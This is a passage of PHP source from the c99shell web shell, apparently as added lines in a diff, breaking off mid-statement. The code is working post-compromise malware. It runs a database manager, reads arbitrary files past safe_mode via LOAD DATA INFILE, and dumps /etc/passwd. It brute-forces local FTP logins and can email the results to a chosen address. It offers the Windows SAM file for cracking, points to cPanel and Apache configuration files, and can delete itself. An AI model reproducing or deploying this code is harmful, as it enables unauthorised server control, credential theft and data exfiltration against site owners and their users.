rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option 
value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input 
type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo 
"<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + 
echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>+</b></center></td>"; + echo "<td><center><b>".$i." 
table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" 
value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL 
".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo 
"</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." 
with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." 
report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if 
($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. 
<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." 
- </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = 
text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" 
readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = 